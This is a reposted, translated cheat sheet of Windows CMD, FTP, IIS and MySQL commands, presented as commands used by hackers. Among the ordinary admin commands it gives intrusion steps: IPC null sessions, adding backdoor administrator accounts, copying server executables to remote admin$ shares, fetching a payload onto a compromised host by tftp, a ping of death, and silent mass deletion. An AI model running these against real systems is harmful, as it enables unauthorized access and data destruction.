Some of the CMD commands used by hackers

Source: Internet
Author: User

Reposted from: http://topic.csdn.net/u/20110417/03/85f52649-064f-46ad-b466-f9a4c154e29b.html?seed=2023046095&r= 75217708#r_75217708

net use \\ip\ipc$ "" /user:""  Establish an IPC null connection
net use \\ip\ipc$ "password" /user:"username"  Establish a non-null IPC connection
net use h: \\ip\c$ "password" /user:"username"  Log in directly and map the remote C: drive to local H:
net use h: \\ip\c$  After logging in, map the remote C: drive to local H:
net use \\ip\ipc$ /del  Delete the IPC connection
net use h: /del  Remove the mapping of the remote drive to local H:
net user username password /add  Create a user
net user guest /active:yes  Activate the Guest user
net user  See which users exist
net user accountname  View the properties of the account
net localgroup administrators username /add  Add the user to the Administrators group so that it has administrator privileges. Note: the group name is the plural, "administrators", with a trailing s
net start  See which services are running
net start servicename  Start a service (such as: net start telnet, net start schedule)
net stop servicename  Stop a service
net time \\targetip  View the remote host's time
net time \\targetip /set  Synchronize the local computer's time with the target IP host; add the parameter /yes to skip the confirmation prompt
net view  See which shares are open on the local LAN
net view \\ip  See which shares are open on the remote host's LAN
net config  Display the system's network settings
net logoff  Disconnect shares
net pause servicename  Pause a service
net send ip "text message"  Send a message to the remote host
net ver  Network connection type and information in use within the LAN
net share  View locally opened shares
net share ipc$  Open the ipc$ share
net share ipc$ /del  Delete the ipc$ share
net share c$ /del  Delete the C: share
net user guest 12345  After logging in as the Guest user, change its password to 12345
net password password  Change the system login password
netstat -a  See which ports are open; netstat -an is commonly used
netstat -n  View the network connections of the ports; netstat -an is commonly used
netstat -v  View work in progress
netstat -p protocolname  View the usage of a protocol. Example: netstat -p TCP/IP (view TCP/IP protocol usage)
netstat -s  View the usage of all protocols in use
nbtstat -A ip  If one of the remote host's ports 136 to 139 is open, you can view its most recently logged-in user name (the user name is the entry before 03). Note: the parameter -A is uppercase
tracert -parameter ip (or computer name)  Trace the route (of packets). Parameter: "-w number" sets the time-out interval.
ping ip (or domain name)  Send data to the remote host, 32 bytes by default. Parameters: "-l [space] packet size"; "-n number of packets to send"; "-t" means ping continuously.
ping -t -l 65550 ip  Ping of death (sending more than 64K of data and pinging continuously is the ping of death)
ipconfig (winipcfg)  For Windows NT and XP (Windows 95/98): view the local IP address; ipconfig accepts the parameter "/all" to display all configuration information
tlist -t  Display the processes as a tree (an additional system tool, not installed by default; found in the Support/tools folder of the installation directory)
kill -f processname  With the -f parameter, force a process to end (an additional system tool, not installed by default; found in the Support/tools folder of the installation directory)
del -f filename  With the -f parameter, read-only files can be deleted. /ar, /ah, /as, /aa delete read-only, hidden, system and archive files respectively; /a-r, /a-h, /a-s, /a-a delete files other than read-only, hidden, system and archive files. For example, "del /ar *.*" deletes all read-only files in the current directory, and "del /a-s *.*" deletes all files except system files in the current directory
del /s /q directory  or: rmdir /s /q directory  /s deletes the directory together with all subdirectories and files under it; /q suppresses the system confirmation for the delete operation. (The two commands do the same thing)
move drive:\path\file-to-move destination-path\new-filename /y  Move a file; /y suppresses the confirmation prompt shown when the destination directory already contains a file with the same name.
fc one.txt two.txt > 3st.txt  Compare two files and write the differences to the 3st.txt file; ">" and ">>" are redirection operators
at id  Open a registered scheduled task
at /delete  Stop all scheduled tasks; with the parameter /yes, stop them directly without confirmation
at id /delete  Stop a registered scheduled task
at  View all scheduled tasks
at \\ip time programname (or a command) /r  Run a program on the remote host at a given time and restart the computer
finger username@host  See which users have recently logged in
telnet ip port  Log in to a remote server; the default port is 23
open ip  Connect to the IP (a command used after starting telnet)
telnet  Typing telnet directly on the local machine enters the local telnet
copy path\filename1 path\filename2 /y  Copy file 1 to the specified directory as file 2; the parameter /y suppresses the confirmation when an existing file would be overwritten
copy c:\srv.exe \\ip\admin$  Copy the local c:\srv.exe to the remote host's admin$ share
copy 1st.jpg/b+2st.txt/a 3st.jpg  Hide the contents of 2st.txt in 1st.jpg and generate the new file 3st.jpg. Note: the file header of 3st.jpg needs three empty lines. Parameters: /b marks a binary file, /a marks 2st.txt as an ASCII (text) file
copy \\ip\admin$\svv.exe c:\  or: copy \\ip\admin$\*.*  Copy the srv.exe file (or all files) from the remote admin$ share to local C:
xcopy file-or-directory-tree destination\directoryname  Copy files and directory trees; with the parameter /y it does not prompt before overwriting the same file
tftp -i own-ip get server.exe c:\server.exe  (When a compromised machine is used as a springboard, use that machine's IP here.) After logging in, download server.exe from "IP" to the target host as c:\server.exe. Parameter: -i means binary transfer mode, used for example when transferring an EXE file; without -i the transfer runs in ASCII mode (text file mode)
tftp -i remote-ip put c:\server.exe  After logging in, upload the local c:\server.exe to the host
ftp ip port  Used to upload files to a server or perform file operations; the default port is 21. bin means binary transfer (for executable files); the default is ASCII transfer (for text files)
route print  Display the IP routing table, mainly showing the network address (Network Address), subnet mask (Netmask), gateway address (Gateway Address) and interface address (Interface)
arp  View and manipulate the ARP cache. ARP is responsible for resolving an IP address to a physical MAC address. arp -a shows all the information
start programname-or-command /max or /min  Open a new window, maximized (minimized), and run a program or command in it
mem  View CPU usage
attrib filename (directoryname)  View the attributes of a file (directory)
attrib filename -a -r -s -h or +a +r +s +h  Remove (add) the archive, read-only, system and hidden attributes of a file; use + to add an attribute
dir  View files. Parameters: /q shows which system user owns the files and directories; /t:c shows the file creation time; /t:a shows the last access time; /t:w shows the last modified time
date /t, time /t  With this parameter, that is "date /t" and "time /t", only the current date and time are displayed, without a prompt to enter a new date and time
set variablename=characters-to-assign  Set an environment variable
set  Show all current environment variables
set p (or another character)  Show all current environment variables that begin with the character p (or the other character)
pause  Suspend the batch program and display: Press any key to continue ....
if  Perform conditional processing in a batch program (see the if command and variables for more)
goto label  Direct cmd.exe to the labeled line in a batch program (the label must be on a line of its own and start with a colon, for example the ":start" label)
call path\batchfilename  Invoke another batch program from a batch program (see call /? for more details)
for  Execute a specific command for each file in a set of files (see the for command and variables for more)
echo on or off  Turn echo on or off; echo alone, without arguments, displays the current echo setting
echo message  Display the message on the screen
echo message >> pass.txt  Save "message" to the pass.txt file
findstr "Hello" aa.txt  Find the string Hello in the aa.txt file
find filename  Look for a file
title name  Change the cmd window title
color colorvalue  Set the cmd console foreground and background colors; 0 = black, 1 = blue, 2 = green, 3 = aqua, 4 = red, 5 = purple, 6 = yellow, 7 = white, 8 = gray, 9 = blue, a = light green, b = pale green, c = red, d = light purple, e = yellowish, f = bright white
prompt name  Change the command prompt displayed by cmd.exe (changes c:\, d:\ uniformly to: entsky\)
print filename  Print a text file
ver  Display version information in the DOS window
winver  Pop up a window that displays version information (memory size, system version, patch version, computer name)
format drive: /fs:type  Format a disk; type: FAT, FAT32, NTFS. Example: format d: /fs:ntfs
md directoryname  Create a directory
replace sourcefile directory-of-file-to-replace  Replace files
ren oldfilename newfilename  Rename a file
tree  Display the directory as a tree; with the parameter -f it lists the names of the files in the folder
type filename  Display the contents of a text file
more filename  Display the output file screen by screen
doskey command-to-lock=characters
doskey command-to-unlock=  Lock commands for DOS (edit the command line, recall Win2K commands, and create macros). For example, lock the dir command: doskey dir=entsky (doskey dir=dir cannot be used); unlock: doskey dir=
taskmgr  Bring up the Task Manager
chkdsk /f d:  Check disk D and display a status report; the parameter /f also repairs errors on the disk
tlntadmn  Telnet service admin; type tlntadmn, choose option 3, and then select 8 to change the telnet service default port 23 to any other port
exit  Exit the cmd.exe program; with the parameter /b, exit the current batch script instead of cmd.exe
path path\executable-filename  Set a path for an executable file.
cmd  Start a Win2K command interpreter window. Parameters: /eff, /en turn command extensions off and on; see cmd /? for more details
regedit /s registryfilename  Import into the registry; the parameter /s means quiet-mode import, without any prompt
regedit /e registryfilename  Export the registry
cacls filename parameters  Display or modify the file access control list (ACL), for the NTFS format. Parameters: /d username: deny the user access; /p username:perm: replace the access rights of the specified user; /g username:perm: grant the specified user access rights. perm can be: N none, R read, W write, C change (write), F full control. Example: cacls d:\test.txt /d pub denies the pub user access to d:\test.txt.
cacls filename  View the list of users' access rights for a file
rem text  Add a comment to a batch file
netsh  View or change the local network configuration
IIS service commands:
iisreset /reboot  Reboot the Win2K computer (the system displays a restart notice first)
iisreset /start or /stop  Start (stop) all Internet services
iisreset /restart  Stop and then restart all Internet services
iisreset /status  Show the status of all Internet services
iisreset /enable or /disable  Enable (disable) restarting of Internet services on the local system
iisreset /rebootonerror  Reboot the computer if an error occurs while the Internet services are being started, stopped, or restarted
iisreset /noforce  If the Internet services cannot be stopped, do not force them to terminate
iisreset /timeout val  If the Internet services have still not stopped when the timeout (in seconds) is reached and the /rebootonerror parameter is specified, the computer reboots. The default values are 20 seconds for restart, 60 seconds for stop, and 0 seconds for reboot.
FTP commands: (detailed instructions later)
The command line format for FTP is:
ftp -v -d -i -n -g [hostname]
-v  Display all the response information from the remote server.
-d  Use debug mode.
-n  Restrict automatic FTP logon, that is, the .netrc file is not used.
-g  Disable file name globbing.
help [command] or ? [command]  View the command description
bye or quit  Terminate the host FTP process and exit FTP management mode.
pwd  List the current remote host directory
put or send localfilename [filename to upload as on the host]  Transfer a local file to the remote host
get or recv [remote host filename] [local filename to download to]  Transfer a file from the remote host to the local host
mget [remote-files]  Receive a batch of files from the remote host to the local host
mput local-files  Send a batch of files from the local host to the remote host
dir or ls [remote-directory] [local-file]  List the files in the current remote host directory. If a local file is given, the result is written to that local file
ascii  Transfer files in ASCII mode (default)
bin or image  Transfer files in binary mode
bell  Sound an alert each time a file transfer completes
cdup  Return to the parent directory
close  Close the FTP session with the remote server (the counterpart of open)
open host [port]  Establish a connection to the specified FTP server; the connection port can be specified
delete  Delete a file on the remote host
mdelete [remote-files]  Delete a batch of files
mkdir directory-name  Create a directory on the remote host
rename [from] [to]  Change a file name on the remote host
rmdir directory-name  Delete a directory on the remote host
status  Display the current FTP state
system  Display the remote host's system type
user user-name [password] [account]  Log on to the remote host again with another user name
open host [port]  Re-establish a new connection
prompt  Interactive prompt mode
macdef  Define a macro command
lcd  Change the current working directory on the local host; if omitted, go to the current user's home directory
chmod  Change file permissions on the remote host
case  When on, file names copied to the local machine with the mget command have all their letters converted to lowercase
cd remote-dir  Enter a remote host directory
cdup  Enter the parent directory of the remote host directory
!  Run an interactive shell on the local machine; exit returns to the FTP environment. Example: !ls *.zip
MySQL commands:
mysql -h hostaddress -u username -p password  Connect to MySQL; if MySQL has just been installed, the superuser root has no password.
(Example: mysql -h110.110.110.110 -uroot -p123456
Note: there may be no space between u and root, and the same applies to the others.)
exit  Exit MySQL
mysqladmin -u username -p oldpassword password newpassword  Change the password
grant select on database.* to username@loginhost identified by \"password\";  Add a new user. (Note: unlike the above, the following are commands inside the MySQL environment, so each ends with a semicolon as the command terminator)
show databases;  Display the list of databases. Initially there are only two databases: mysql and test. The mysql database is very important because it holds MySQL's system information; changing passwords and adding users actually operates on this database.
